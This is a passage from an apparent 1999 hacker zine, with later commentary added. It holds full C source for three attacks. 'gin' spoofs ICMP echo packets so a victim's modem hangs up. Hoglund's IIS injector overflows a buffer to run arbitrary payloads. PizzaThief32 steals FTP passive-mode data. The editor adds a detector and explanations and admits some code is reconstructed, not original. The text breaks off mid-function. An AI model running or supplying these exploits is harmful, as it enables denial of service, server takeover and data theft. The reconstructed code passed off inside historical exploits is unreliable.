* logistic ) you annoy me you stupid fuck, all authorities at PVPHS
* (my old high school) i wish cancer upon you. madcrew, you are gay
* and, anyone else who isnt in my greets list =]
*
* [ disclaimer ]
* i really dont see how i could get in trouble for this stupid program
* its really not that great, but the legal system is gay these days,
* so...this program is for educational purposes only, and the author
* holds no liability for the actions of the people that use it, that
* includes dwarfs, cyclopses, albinos, and anyone else who may happen
* to use my program. dont modify or rip on this shit, suck me
* -- amp
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>
#define VERSION "1.2-05.05" //fixed old compiler compatibility problems
#define FRIEND "foo"
void usage( char *name );
void banner( void );
char *get_progname( char *fullname );
void done( int foo );
void gin( int sockfd, struct sockaddr_in sin, struct sockaddr_in din );
unsigned short in_chksum( unsigned short *ipbuf, int iplen );

int main( int argc, char **argv )
{
    struct hostent *sourceinfo, *destinfo;
    struct sockaddr_in sin, din;
    int sockfd, numpackets, i, one = 1;
    char *target, *source;

    banner();
    if( argc < 4 )
        usage( get_progname( argv[0] ) );
    source = argv[1];
    target = argv[2];
    numpackets = atoi( argv[3] );
    signal( SIGINT, done );
    memset( &sin, 0, sizeof( sin ) );
    memset( &din, 0, sizeof( din ) );
    if( ( sourceinfo = gethostbyname( source ) ) == NULL )
    {
        printf( "cannot resolve source host!\n" );
        exit( -1 );
    }
    memcpy( &sin.sin_addr, sourceinfo->h_addr_list[0], sourceinfo->h_length );
    sin.sin_family = AF_INET;
    if( ( destinfo = gethostbyname( target ) ) == NULL )
    {
        printf( "cannot resolve destination host!\n" );
        exit( -1 );
    }
    memcpy( &din.sin_addr, destinfo->h_addr_list[0], destinfo->h_length );
    din.sin_family = AF_INET;
    if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 )
    {
        printf( "Cannot get raw socket, you must be root!\n" );
        exit( -1 );
    }
    /* we build the IP header ourselves (IPPROTO_RAW already implies this
       on Linux, but say so explicitly for other stacks) */
    setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof( one ) );
    printf( "Source Host\t\t: %s\n", inet_ntoa( sin.sin_addr ) );
    printf( "Target Host\t\t: %s\n", inet_ntoa( din.sin_addr ) );
    printf( "Number\t\t\t: %d\n", numpackets );
    printf( "Have some gin sucka" );
    fflush( stdout );
    for( i = 0; i < numpackets; i++ )
        gin( sockfd, sin, din );
    printf( "\n\nsent %d packet%s...done\n", numpackets,
            ( numpackets == 1 ) ? "" : "s" );
    return 0;
}

void usage( char *name )
{
    /* argument names reconstructed from the argv use in main() */
    printf( "usage: %s <source> <target> <count>\n[ http://www.rootshell.com/ ]\n\n",
            name );
    exit( 0 );
}

void banner( void )
{
    printf( "\ngin [ v%s ] /\\ by amputee\n", VERSION );
    printf( "compiled for: %s\n\n", FRIEND );
}

char *get_progname( char *fullname )
{
    char *retval = strrchr( fullname, '/' );
    return retval ? ++retval : fullname;
}

void done( int foo )
{
    ( void )foo;
    puts( "Exiting...\n" );
    exit( 1 );
}

void gin( int sockfd, struct sockaddr_in sin, struct sockaddr_in din )
{
    /* the Hayes escape sequence, repeated so that one copy still survives
       if the reply is mangled on the way to the modem */
    const char *ginstring = "+++ATH0\r+++ATH0\r+++ATH0\r+++ATH0\r";
    char *packet;
    struct iphdr *ip;
    struct icmphdr *icmp;
    struct timeval tv;
    size_t iphlen = sizeof( struct iphdr );
    size_t icplen = sizeof( struct icmphdr );
    size_t timlen = sizeof( struct timeval );
    size_t len = strlen( ginstring );
    /* ICMP data = a timestamp (as ping sends) followed by the escape string.
       The original allocated iphlen + icplen + len but wrote and sent more
       than that, which is the "some machines seg fault" noted below. */
    size_t total = iphlen + icplen + timlen + len;

    packet = ( char * )malloc( total );
    if( packet == NULL )
    {
        perror( "malloc" );
        exit( -1 );
    }
    memset( packet, 0, total );
    ip = ( struct iphdr * )packet;
    icmp = ( struct icmphdr * )( packet + iphlen );
    /* copy the timeval in rather than writing it in place: the data area
       is not suitably aligned for a struct timeval on 64-bit hosts */
    gettimeofday( &tv, NULL );
    memcpy( packet + iphlen + icplen, &tv, timlen );
    memcpy( packet + iphlen + icplen + timlen, ginstring, len );
    ip->version = 4;
    ip->ihl = 5;
    ip->tos = 0;
    ip->tot_len = htons( total );
    ip->id = htons( rand() & 0xffff );
    ip->frag_off = 0;
    ip->ttl = 255;
    ip->protocol = IPPROTO_ICMP;
    ip->saddr = sin.sin_addr.s_addr;   /* spoofed source: the reply goes here */
    ip->daddr = din.sin_addr.s_addr;
    ip->check = 0;
    ip->check = in_chksum( ( unsigned short * )ip, iphlen );
    icmp->type = ICMP_ECHO;
    icmp->code = 0;
    icmp->un.echo.id = htons( getpid() & 0xffff );
    icmp->un.echo.sequence = 0;
    icmp->checksum = 0;
    /* the ICMP checksum covers the whole message, header and data; the
       original covered only part of the data, so a conforming stack would
       discard the packet instead of echoing it */
    icmp->checksum = in_chksum( ( unsigned short * )icmp, icplen + timlen + len );
    if( sendto( sockfd, packet, total, 0,
                ( struct sockaddr * )&din, sizeof( din ) ) < 0 )
        perror( "sendto" );
    free( packet );
}

// stolen from smurf
unsigned short in_chksum( unsigned short *ipbuf, int iplen )
{
    register int nleft = iplen;
    register int sum = 0;
    unsigned short answer = 0;
    while( nleft > 1 )
    {
        sum += *ipbuf++;
        nleft -= 2;
    }
    if( nleft == 1 )
    {
        *( unsigned char * )( &answer ) = *( unsigned char * )ipbuf;
        sum += answer;
    }
    /* fold the carries back into the low 16 bits (the original had
       "sum + 0xffff" here, which yields a wrong checksum) */
    sum = ( sum >> 16 ) + ( sum & 0xffff );
    sum += ( sum >> 16 );
    answer = ~sum;
    return( answer );
}
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE ---
Also note: some machines seg fault when they run this, and setting the
environment variable MALLOC_CHECK_ to 1 seems to solve this. And..this
code will probably come out all offset and break when you try to compile
it...so just fix it, it compiles fine (i use g++ -O3 -o gin gin.c).
amp
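What the defending side can actually check for, as an added example (mine, not amp's code and not part of the zine): a small C inspector that takes one raw IPv4 packet, confirms it is an ICMP echo request or reply, and scans the echo data for the Hayes escape sequence `+++AT`. The sample packets are constructed inside the block with RFC 5737 documentation addresses, and their checksums are left zero because the inspector does not verify them. The inspector can only flag the sequence on the wire; whether the line actually drops depends on the modem's guard time, which on Hayes-compatible modems lives in register S12 (in units of 1/50 s) and is exactly the setting amp is telling you to fix; setting S2=255 instead disables escape-sequence detection altogether.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Offset of the first "+++AT" (AT matched case-insensitively) in p[0..n),
   or -1 if absent. */
long find_hayes_escape(const unsigned char *p, size_t n)
{
    size_t i;
    for (i = 0; i + 5 <= n; i++) {
        if (p[i] == '+' && p[i + 1] == '+' && p[i + 2] == '+' &&
            toupper(p[i + 3]) == 'A' && toupper(p[i + 4]) == 'T')
            return (long)i;
    }
    return -1;
}

/* Classify one raw IPv4 packet:
     0  not an ICMP echo request/reply (or too short / malformed)
     1  ICMP echo request/reply with no escape sequence in its data
     2  ICMP echo request/reply carrying "+++AT" in its data
   *off receives the offset of the sequence within the ICMP data (or -1). */
int inspect_ipv4_packet(const unsigned char *pkt, size_t len, long *off)
{
    size_t ihl, tot, dlen;
    const unsigned char *icmp;
    long o;
    if (off) *off = -1;
    if (len < 20 || (pkt[0] >> 4) != 4) return 0;
    ihl = (size_t)(pkt[0] & 0x0f) * 4;
    tot = ((size_t)pkt[2] << 8) | pkt[3];
    /* use the declared total length, but only if it fits the capture */
    if (ihl < 20 || tot < ihl + 8 || tot > len) return 0;
    if (pkt[9] != 1) return 0;                  /* protocol is not ICMP */
    icmp = pkt + ihl;
    if (icmp[0] != 8 && icmp[0] != 0) return 0; /* not echo request/reply */
    dlen = tot - ihl - 8;
    o = find_hayes_escape(icmp + 8, dlen);
    if (off) *off = o;
    return o >= 0 ? 2 : 1;
}

/* Constructed sample (not a capture): IPv4 192.0.2.1 -> 192.0.2.2 with the
   given protocol number and ICMP type, data = 8 zero bytes standing in for
   ping's timestamp, then `text`. Returns the packet length, 0 if it does
   not fit in `cap` bytes. */
size_t build_sample(unsigned char *out, size_t cap, int proto, int icmp_type,
                    const char *text)
{
    size_t tlen = strlen(text), total = 20 + 8 + 8 + tlen;
    if (total > cap) return 0;
    memset(out, 0, total);
    out[0] = 0x45;                               /* version 4, IHL 5 */
    out[2] = (unsigned char)(total >> 8);
    out[3] = (unsigned char)(total & 0xff);
    out[8] = 64;                                 /* TTL */
    out[9] = (unsigned char)proto;
    out[12] = 192; out[13] = 0; out[14] = 2; out[15] = 1;
    out[16] = 192; out[17] = 0; out[18] = 2; out[19] = 2;
    out[20] = (unsigned char)icmp_type;          /* code/checksum stay 0 */
    memcpy(out + 36, text, tlen);                /* after the 8-byte timestamp */
    return total;
}

/* Build a sample and return the verdict / the escape offset directly. */
int sample_verdict(int proto, int icmp_type, const char *text)
{
    unsigned char pkt[256];
    size_t n = build_sample(pkt, sizeof pkt, proto, icmp_type, text);
    return inspect_ipv4_packet(pkt, n, NULL);
}

long sample_offset(int proto, int icmp_type, const char *text)
{
    unsigned char pkt[256];
    long off;
    size_t n = build_sample(pkt, sizeof pkt, proto, icmp_type, text);
    inspect_ipv4_packet(pkt, n, &off);
    return off;
}
```

The data offset is reported relative to the ICMP data so it lines up with what gin.c builds: timestamp first, escape string at byte 8. Matching `+++AT` rather than the full `+++ATH0` also catches the `+++ATH0,,,DT...` dial-out variant amp mentions.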
@HWA
115.0 IIS Remote Exploit (injection code)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 16 Jun 1999 08:58:05 -0700
From: Greg Hoglund
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: IIS Remote Exploit (injection code)
I read yesterday on eEye.com that they had discovered a buffer overflow in
IIS. I could not resist writing an exploit. I did not have time to design
a really cool payload for this exploit, so I simply wrote the injection
code. However, this is meaningful for several reasons. Attached is the
injection code. The exploit will deliver any payload of your choosing.
Your payload will be executed. This empowers you to create a "collection"
of payloads that are not dependent upon the injection vector in any way.
This decoupling is important for military needs, where a single injection
vector needs to work, but the "warhead" may be different depending on the
target's characterization.
The exploit was fairly simple to build. In short, I read on eEye.com that
they had overflowed IIS with something like a ~3000 character URL. Within
minutes I had caused IIS to crash with EIP under my control. I used a
special pattern in the buffer (see code) to make it easy for me to identify
where EIP was being popped from. The pattern also made it easy to
determine where I was jumping around. Use the tekneek Danielson. ;-)
So, I controlled EIP, but I needed to get back to my stack segment, of
course. This is old school, and I really lucked out. Pushed down two
levels on the stack was an address for my buffer. I couldn't have asked
for more. So, I found a location in NTDLL.DLL (0x77F88CF0) that I could
return to. It had two pop's followed by a return. This made my injection
vector return to the value that was stored two layers down on the stack.
Bam, I was in my buffer. So, I landed in a weird place, had to add a near
jump to get to somewhere more useful.. nothing special, and here we are
with about 2K of payload space. If you don't supply any mobile code to be
run, the injection vector will supply some for you. The default payload is
simply a couple of no-ops followed by a debug breakpoint (interrupt 3)...
It's easy to play with if you want to build your own payloads.. just keep a
debugger attached to inetinfo.exe on the target machine.
Lastly, I would simply like to point out that monoculture installations are
very dangerous. It's a concept from agribusiness.. if you have all one
crop, and a virus comes along that can kill that crop, you're out of
business. With almost ALL of the IIS servers on the net being vulnerable
to this exploit, we also have a monoculture. And, it's not just IIS. The
backbone of the Internet is built on common router technology (such as
cisco IOS). If a serious exploit comes along for the IOS kernel, can you
imagine the darkness that will fall?
<--- snip
// IIS Injector for NT
// written by Greg Hoglund
// http://www.rootkit.com
//
// If you would like to deliver a payload, it must be stored in a binary file.
// This injector decouples the payload from the injection code allowing you to
// create a number of different attack payloads. This code could be used, for
// example, by a military that needs to attack IIS servers, and has characterized
// the eligible hosts. The proper attack can be chosen depending on needs. Since
// the payload is so large with this injection vector, many options are available.
// First and foremost, virii can be delivered with ease. The payload is also plenty
// large enough to remotely download and install a back door program.
// Considering the monoculture of NT IIS servers out on the 'Net, this represents a
// very serious security problem.
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char **argv)
{
    SOCKET s = 0;
    WSADATA wsaData;
    if(argc < 2)
    {
        /* argument names reconstructed from the argv use below */
        fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " \
            "http://www.rootkit.com\nUsage: %s <target ip> [payload file]\n", argv[0]);
        exit(0);
    }
    WSAStartup(MAKEWORD(2,0), &wsaData);
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(INVALID_SOCKET != s)
    {
        SOCKADDR_IN anAddr;
        anAddr.sin_family = AF_INET;
        anAddr.sin_port = htons(80);
        anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
        if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
        {
            static char theSploit[4096];
            int i;
            // fill pattern
            char kick = 'z'; //0x7a
            char place = 'A';
            // my uber sweet pattern gener@t0r
            for(i=0;i<4096;i+=4)
            {
                theSploit[i] = kick;
                theSploit[i+1] = place;
                theSploit[i+2] = place + 1;
                theSploit[i+3] = place + 2;
                if(++place == 'Y') // beyond 'XYZ'
                {
                    place = 'A';
                    if(--kick < 'a') kick = 'a';
                }
            }
            _snprintf(theSploit, 5, "get /");
            _snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0");
            // after crash, looks like inetinfo.exe is jumping to the address
            // stored @ location 'GHtG' (0x47744847)
            // cross reference back to the buffer pattern, looks like we need
            // to store our EIP into theSploit[598]
            // magic eip into NTDLL.DLL
            theSploit[598] = (char)0xF0;
            theSploit[599] = (char)0x8C;
            theSploit[600] = (char)0xF8;
            theSploit[601] = (char)0x77;
            // code I want to execute
            // will jump foward over the
            // embedded eip, taking us
            // directly to the payload
            theSploit[594] = (char)0x90; //nop
            theSploit[595] = (char)0xEB; //jmp
            theSploit[596] = (char)0x35; //
            theSploit[597] = (char)0x90; //nop
            // the payload. This code is executed remotely.
            // if no payload is supplied on stdin, then this default
            // payload is used. int 3 is the debug interrupt and
            // will cause your debugger to "breakpoint" gracefully.
            // upon examination you will find that you are sitting
            // directly in this code-payload.
            if(argc < 3)
            {
                theSploit[650] = (char) 0x90; //nop
                theSploit[651] = (char) 0x90; //nop
                theSploit[652] = (char) 0x90; //nop
                theSploit[653] = (char) 0x90; //nop
                theSploit[654] = (char) 0xCC; //int 3
                theSploit[655] = (char) 0xCC; //int 3
                theSploit[656] = (char) 0xCC; //int 3
                theSploit[657] = (char) 0xCC; //int 3
                theSploit[658] = (char) 0x90; //nop
                theSploit[659] = (char) 0x90; //nop
                theSploit[660] = (char) 0x90; //nop
                theSploit[661] = (char) 0x90; //nop
            }
            else
            {
                // send the user-supplied payload from
                // a file. Yes, that's a 2K buffer for
                // mobile code. Yes, that's big.
                FILE *in_file;
                int c;
                in_file = fopen(argv[2], "rb");
                if(in_file)
                {
                    int offset = 650;
                    // stop at EOF itself; the original feof() loop wrote
                    // one extra 0xFF byte past the end of the payload
                    while(offset < 3000 && (c = fgetc(in_file)) != EOF)
                    {
                        theSploit[offset++] = (char)c;
                    }
                    fclose(in_file);
                }
            }
            // the request ends at the first NUL, i.e. just past the
            // ".htr HTTP/1.0" tail written at 3005
            send(s, theSploit, strlen(theSploit), 0);
        }
        closesocket(s);
    }
    WSACleanup();
    return 0;
}
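The pattern trick Hoglund describes (tag the buffer so that the value the debugger shows in EIP tells you the offset) as a stand-alone added example; this is my code, not the post's, and it talks to no server. It uses the same generator as the injector, adds the lookup from a little-endian EIP value back to a buffer offset, and the arithmetic for the `EB 35` short jump placed at 595. Running it on the post's 0x47744847 gives 598, the offset the injector uses. One caveat the post does not mention: `kick` is pinned at 'a' once it gets there, so the pattern repeats after 26 * 96 = 2496 bytes and a crash value taken from beyond that point is ambiguous; the lookup returns the first occurrence.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PATTERN_LEN 4096

/* Fill buf with the injector's pattern: 4-byte groups of
   kick, place, place+1, place+2, with place running 'A'..'X' and kick
   counting down from 'z' each time place wraps. Same loop as the post. */
void gen_pattern(char *buf, size_t n)
{
    char kick = 'z', place = 'A';
    size_t i;
    for (i = 0; i + 4 <= n; i += 4) {
        buf[i] = kick;
        buf[i + 1] = place;
        buf[i + 2] = (char)(place + 1);
        buf[i + 3] = (char)(place + 2);
        if (++place == 'Y') {
            place = 'A';
            if (--kick < 'a') kick = 'a';
        }
    }
}

/* Offset in buf of the four bytes that, read little-endian (as x86 loads a
   return address), equal eip; -1 if they never occur. Only the first
   occurrence is reported; windows are unique for the first 2496 bytes. */
long pattern_offset(const char *buf, size_t n, uint32_t eip)
{
    unsigned char want[4];
    size_t i;
    want[0] = (unsigned char)(eip & 0xff);
    want[1] = (unsigned char)((eip >> 8) & 0xff);
    want[2] = (unsigned char)((eip >> 16) & 0xff);
    want[3] = (unsigned char)((eip >> 24) & 0xff);
    for (i = 0; i + 4 <= n; i++)
        if (memcmp(buf + i, want, 4) == 0)
            return (long)i;
    return -1;
}

/* Generate the pattern and look up one crash value in one call. */
long offset_for_crash(uint32_t eip)
{
    static char buf[PATTERN_LEN];
    gen_pattern(buf, sizeof buf);
    return pattern_offset(buf, sizeof buf, eip);
}

/* Where a two-byte short jump (EB rel8) at offset `at` lands: the
   displacement is relative to the end of the instruction. */
size_t jmp_rel8_target(size_t at, int8_t rel)
{
    return at + 2 + rel;
}
```

`jmp_rel8_target(595, 0x35)` is 650, which is why the default payload starts at theSploit[650]: the jump at 594..597 hops over the four EIP bytes at 598..601 and the bytes between.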
@HWA
116.0 ActiveX security revisited
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 9 Jun 1999 12:22:00 +0100
From: "Steve Loughran"
Subject: ActiveX Security Revisited
The latest Microsoft security bulletin
(http://www.microsoft.com/security/bulletins/ms99-018.asp) includes two
Internet Explorer patches. The first is a classic stack overrun: a web page
can supply an icon for use when adding to the favourite links list, and a
malformed icon could overrun the stack and so execute arbitrary code.
The second fault is a security hole in an ActiveX control, and is a simple
instantiation of the problem covered in RISKS-18.85 and RISKS-18.86,
namely that code signing is a far less safe method of software distribution
than a 'sandbox' for untrusted code.
It so happens that one of the ActiveX controls dating from IE3 can be used
to test for the presence or absence of files on a hard disk, and while no
access to the contents is granted, it can be used to build up a picture of
what applications are installed. My demonstration page
(http://www.iseran.com/ActiveX/filesearch.html) shows a naive script
looking for common windows files in well known places; it could just as
easily look for well known applications as a preamble to an application
specific attack.
The insecure 'Preloader' control has some interesting properties. Firstly,
it is signed by Microsoft, showing that even the inventors of ActiveX and
the entire Win32 API did not test their controls rigorously enough.
Secondly, some distributions of Internet Explorer may have automatically
installed the control, in which case the control download or signature
verification process is bypassed.
It so happens that the default security settings of Outlook and Outlook
Express allow this in e-mail messages, which means anyone could send a web page
referencing the control to any known recipient and stand a moderate chance
of being able to enumerate some disk files, possibly with no visible
notification to the recipient. This strikes me as a more serious problem
than the risk incurred by looking at random web pages, as it enables attacks
targeted at individual recipients.
Within four weeks of notifying Microsoft via their security e-mail alias the
company announced the problem, and withdrew the control from their own web
site, which seems a reasonable response time. Of course, if ActiveX had
included a mechanism whereby the signer of a control could retroactively
revoke that control then it would have been trivial to disable the control
remotely. Instead the company had to patch IE to permanently disable the
control. Few other companies would have this luxury.
While enabling or disabling ActiveX use for web site access is entirely a
matter of preference, I would personally recommend that all users of
Microsoft e-mail applications alter their e-mail client security settings so
that neither ActiveX nor scripting languages are supported in incoming
messages. This can be done by setting the e-mail security zone to 'restricted'.
-Steve
-----------------------------------------------------------------------------
The ActiveX Hard Disk Explorer
This page uses the ability of the preloader control to report the presence or absence
of a file or url to a controlling script. It loops through a number of "Well
known" files to determine information about the user's system. This information could
be fed back to a web server for marketing reasons, or used to test for the presence of
other security weaknesses which could be exploited.
The example script is not very smart and does not use the results of initial tests to
determine further directions of investigation. For example, even if the absence of the
file c:\boot.ini reliably indicates there is no version of NT installed, the script still
looks for the OS in common locations. The results of individual tests are stored, and
could be used for better searching, or could be fed back to a server with ease.
Examining the source shows how this is could be accomplished. Oh, and
if you mail this to someone who uses Outlook to read their mail, guess
what happens when they get it? Recipients will have to be grateful this
file search is not done after a page load, and that the results are not
sent back to the server.
June 1999: Within a few weeks of notifying Microsoft the
errant control has been removed from their site, although there is
nothing to stop mischievous web site authors from serving the control
locally, as is done here. A patch to IE actually disables the control
for good.
@HWA
117.0 denial of service attack against NT PDC from Win95 workstation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 4 Jun 1999 14:01:01 -0700
Reply-To: Carl Byington
Sender: Windows NT BugTraq Mailing List
From: Carl Byington
Subject: denial of service attack against NT PDC from Win95 workstation
-----BEGIN PGP SIGNED MESSAGE-----
I searched the archives, but did not find this one discussed.
We have an NT PDC and a bunch of Win95 workstations. The NT domain name is
AAA and the PDC netbios machine name is BBB. Normally, the Win95
workstations are configured to logon to the NT domain, and with the
identification tab set to workgroup=AAA. This works nicely.
However, we misconfigured a Win95 box with workgroup=BBB. No symptoms were
evident until the server was rebooted after a power failure (properly
handled by an APC UPS). We then got the 'BBB is not a valid computer name'
which caused the workstation service to fail to start, and that in turn
prevented a bunch of other stuff from starting. The event log entry pointed
to the IP address of the PDC as being responsible for trying to add the
conflicting name BBB.
We could manually start the affected services, starting with the
workstation service. At that point, things seemed to be more or less
normal, but user manager for domains had problems opening the user list.
These symptoms seemed to be similar to those listed in MS article Q166184,
but we don't have RAS installed on that machine, and we don't have any
static WINS entries. However, we did not scroll through the full list of
workstations in the WINS database, or we would have seen the Win95
workstation that had registered the name BBB.
At this point, we deleted the entire WINS database and rebooted the server.
Things worked normally until that workstation again registered its name as
BBB, but this time the event log pointed to the workstation IP so we could
finally track it down.
The server is running NT4, SP3.
-----BEGIN PGP SIGNATURE-----
Version: 4.5
iQCVAgUBN1g+hdZjPoeWO7BhAQFtoAQAqEkBc/RfrRuIyddbQRZ+gJxHYnflk0NU
pAv+vx9vbI/qAVzdPH2anLMyb4Sci042Tix9bsRCHIB3V6f8qqBgaOSpJjzZEn8z
OmY+sxlgnuC6yO4c2VWXJTh4OGq6HS0wjhPdQKfKHvYe5BvePeJ6+S8gl5BuG5lO
pV33Ftg1JRU=
=Dt/i
-----END PGP SIGNATURE-----
PGP key available from the key servers.
Key fingerprint 95 F4 D3 94 66 BA 92 4E 06 1E 95 F8 74 A8 2F A0
http://www.five-ten-sg.com
@HWA
118.0 Microsoft win2k PASV vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 15 Jun 1999 10:39:34 -0700
From: Greg Hoglund
To: BUGTRAQ@netspace.org
Subject: Microsoft win2k PASV vulnerability
Many people are aware of an old vulnerability with FTP servers. The
problem is related to not authenticating the source address of PASV port
connections. To add insult to injury, many FTP servers also open these
ports in sequential order. Now, I would expect that many of the older
installations out on the 'Net would be vulnerable. However, I would not
expect the latest Beta release of Microsoft Windows 2000 server to have
this vulnerability. Come on people!
After discovering this problem on my W2k installation, I tested it against
ftp.microsoft.com. No surprises.. their public ftp server is vulnerable
also. Now, using FTP w/o SSH in the first place is a bad idea. However, I
still think that this vulnerability is easy to fix and of all things it
shouldn't be present in win2k. My wu-ftp install doesn't have this problem.
I dug around on the net to see if anyone had written a script for
this. I found "pizzathief" for solaris. I re-wrote the program for NT and
added some features. The source code for "PizzaThief32" is posted below.
<--- snip
/*
* PizzaThief32 Exploit written by Greg Hoglund
*
* Special thanks to Jeffrey R. Gerber for thinking of such a cool name
* and to Bret McDanel for writing pizzathief for solaris!
*
* A common problem with FTP servers around the world results from
* "passive mode". A client will issue the PASV command and the
* server will in turn open a local port and wait for the client to
* connect. Once the client connects, the server will transmit the
* file or directory listing or whatever big chunk of data the client
* wanted. The crux of the problem is that many FTP servers do not
* check the source address of the connecting client. Hence, if the
* men in black manage to connect to that port before you do, you lose
* your file to someone else! And if this problem wasn't old as mold
* already, Microsoft's Windows 2000 FTP server (version 5.0 I think)
* has the problem. In fact, so does Microsoft's *public* FTP site!
* And the icing on the cake is many FTP servers open PASV ports in
* sequential order making the guesswork easy.
*
* This 'sploit runs under Windows NT and uses nonblocking i/o to snag
* as much data as possible. The code is cleaned up a bit, and the
* tool will now snag connections in a cycle.
*/
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#pragma comment(lib, "ws2_32.lib")
#define NUMSOCK 64
#define FLAG_VERBOSE (0x1 << 1)
#define FLAG_STDOUT (0x1 << 2)
int connserver(char *host,int port);
int netgets(char *buff, int len, int sd);
void dumpdata(int theSocket, struct in_addr ip, unsigned short port);
int pizzaman32(struct in_addr ip, unsigned short port);
unsigned long gFlags = 0;
unsigned long gTimeout = 5000;

int main(int argc, char **argv)
{
    int sd, count;
    struct in_addr ip;
    char buff[1024],*ptr1;
    unsigned short int port;
    WSADATA wsaData;
    if(0 != WSAStartup(MAKEWORD(2,0), &wsaData))
    {
        WSACleanup();
        fprintf(stderr, "Could not load winsock DLL\n");
        exit(0);
    }
    if(argc < 2)
    {
        /* argument name reconstructed from the argv handling below */
        fprintf(stderr, "Pizzathief32 for NT!\nFrom the Law Offices of Hoglund, " \
            "McDanel, & Gerber\nUsage: %s [-v -tTimeout -s] <host>" \
            "\n options: -v Verbose\n " \
            "-t timeout in ms\n -s dump to stdout\n",argv[0]);
        exit(0);
    }
    /* options come first; stop before running off the end of argv
       (the original indexed argv[++count] unconditionally) */
    count = 0;
    while(count + 1 < argc && argv[++count][0] == '-'){
        switch(argv[count][1]){
        case 'v':
            gFlags |= FLAG_VERBOSE;
            break;
        case 't':
            if(isdigit(argv[count][2]))
                gTimeout = atoi(&argv[count][2]);
            break;
        case 's':
            gFlags |= FLAG_STDOUT;
            break;
        default:
            break;
        }
    }
    if(count >= argc || argv[count][0] == '-')
    {
        fprintf(stderr, "no host given\n");
        exit(0);
    }
    if((sd=connserver(argv[count],21)) < 0)
    {
        fprintf(stderr, "could not connect to server\n");
        exit(0);
    }
    while(1)
    {
        if(netgets(buff,sizeof(buff),sd)==0)
        {
            fprintf(stderr, "server closed control connection\n");
            closesocket(sd);
            exit(0);
        }
        if(!strncmp(buff,"220 ",4))
        {
            if(FLAG_VERBOSE & gFlags)
                fprintf(stdout, "requesting username\n");
            sprintf(buff,"user ftp\n");
            send(sd,buff,strlen(buff),0);
        }
        if(!strncmp(buff,"331 ",4))
        {
            if(FLAG_VERBOSE & gFlags)
                fprintf(stdout, "requesting password\n");
            sprintf(buff,"pass pizzaman@illuminati.gov\n");
            send(sd,buff,strlen(buff),0);
        }
        if(!strncmp(buff,"230 ",4))
        {
            if(FLAG_VERBOSE & gFlags)
                fprintf(stdout, "we are logged in now\n");
            sprintf(buff,"pasv\n");
            send(sd,buff,strlen(buff),0);
        }
        if(!strncmp(buff,"530 ",4))
        {
            /* invalid password */
            sprintf(buff,"quit\n");
            send(sd,buff,strlen(buff),0);
            closesocket(sd);
            fprintf(stderr, "User ftp wasnt allowed\n");
            exit(0);
        }
        if(!strncmp(buff,"227 ",4))
        {
            char seps[] = "()";
            char *token;
            /* PASV response: 227 Entering Passive Mode (h1,h2,h3,h4,p1,p2) */
            if(FLAG_VERBOSE & gFlags)
                fprintf(stdout, "%s", buff);   /* never pass server text as a format string */
            /* first get the ip/port into the buffer */
            token = strtok(buff,seps);
            token = strtok((char *)NULL,")");
            /* now break off the IP part; the bytes land in network order */
            ptr1=(char *)&ip;
            ptr1[0]=atoi(strtok(token,","));
            ptr1[1]=atoi(strtok((char *)NULL,","));
            ptr1[2]=atoi(strtok((char *)NULL,","));
            ptr1[3]=atoi(strtok((char *)NULL,","));
            /* now get the port number, likewise already in network order */
            ptr1=(char *)&port;
            ptr1[0]=atoi(strtok((char *)NULL,","));
            ptr1[1]=atoi(strtok((char *)NULL,","));
            sprintf(buff,"pasv\n"); // recirculate pasv connection
            send(sd,buff,strlen(buff),0);
            pizzaman32(ip,port);
        }
    }
    return(0);
}

int connserver(char *host,int port)
{
    SOCKET sd;
    unsigned long addr;
    struct hostent *he;
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof(sa));
    /* try to resolve the host */
    if((addr=inet_addr(host))!= INADDR_NONE)
    {
        /* dotted decimal */
        memcpy(&sa.sin_addr,(char *)&addr,sizeof(addr));
    }
    else
    {
        if((he=gethostbyname(host))==NULL)
        {
            fprintf(stderr, "Unable to resolve %s\n", host);
            return(-1);
        }
        memcpy(&sa.sin_addr,he->h_addr_list[0],he->h_length);
    }
    sa.sin_port=htons(port);
    sa.sin_family=AF_INET;
    if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        fprintf(stderr, "socket: error %d\n", WSAGetLastError());
        return(-1);
    }
    if(connect(sd,(struct sockaddr *)&sa,sizeof(sa))<0)
    {
        fprintf(stderr, "connect: error %d\n", WSAGetLastError());
        closesocket(sd);
        return(-1);
    }
    return((int)sd);
}

/* NOTE: the zine's copy of this file lost everything between the "i<len"
   of netgets() and the "> 0)" of the receive loop in dumpdata() (the
   extractor swallowed it as an HTML tag). The rest of netgets(), the
   start of dumpdata() and the whole of pizzaman32() below are
   reconstructed from the surviving calls and the header comment; they
   are not Hoglund's original lines. */

/* read one line from the control connection a byte at a time so nothing
   past the newline is consumed; returns 0 if the server closed. */
int netgets(char *buff, int len, int sd)
{
    int i;
